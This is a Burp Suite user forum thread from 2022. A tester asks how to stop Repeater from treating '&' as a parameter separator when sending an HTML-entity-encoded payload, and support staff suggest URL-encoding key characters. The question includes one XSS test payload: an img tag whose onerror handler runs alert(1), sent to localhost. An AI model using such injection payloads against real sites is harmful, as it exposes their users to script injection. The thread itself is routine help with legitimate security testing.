Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Avoid character &

Gonzalo | Last updated: Feb 03, 2022 12:18AM UTC

Hello, Is there a way to avoid the "&" character in Repeater when using HTML encoding? For example, to exploit XSS via this encoding (as mentioned here https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings) I use: ``` GET /search?q=ok"><img+src=x+onerror="&#x61;lert(1)"> Host: localhost ``` Burp Suite interprets the "and" character as a separation of variables. Can I modify this so that it doesn't interpret it that way so I can send the request normally?

Liam, PortSwigger Agent | Last updated: Feb 03, 2022 01:22PM UTC

I would suggest pasting this into a new Repeater tab > right-click > Convert selection > URL-encode key characters. Alternatively, you can right-click > URL-encode as you type > manually type in the URL in a Repeater tab. Let us know if this helps.

Gonzalo | Last updated: Feb 07, 2022 11:21PM UTC

Hello! Thanks for your reply. Sometimes I have the problem when I send any request with this character encoding (&=%26) the server does not interpret this encoding. I guess this is a restriction in the app in front of me.

Liam, PortSwigger Agent | Last updated: Feb 08, 2022 10:01AM UTC

If you encounter this error in the future, could you email us with a screenshot? (support@portswigger.net)

Gonzalo | Last updated: Feb 18, 2022 01:18AM UTC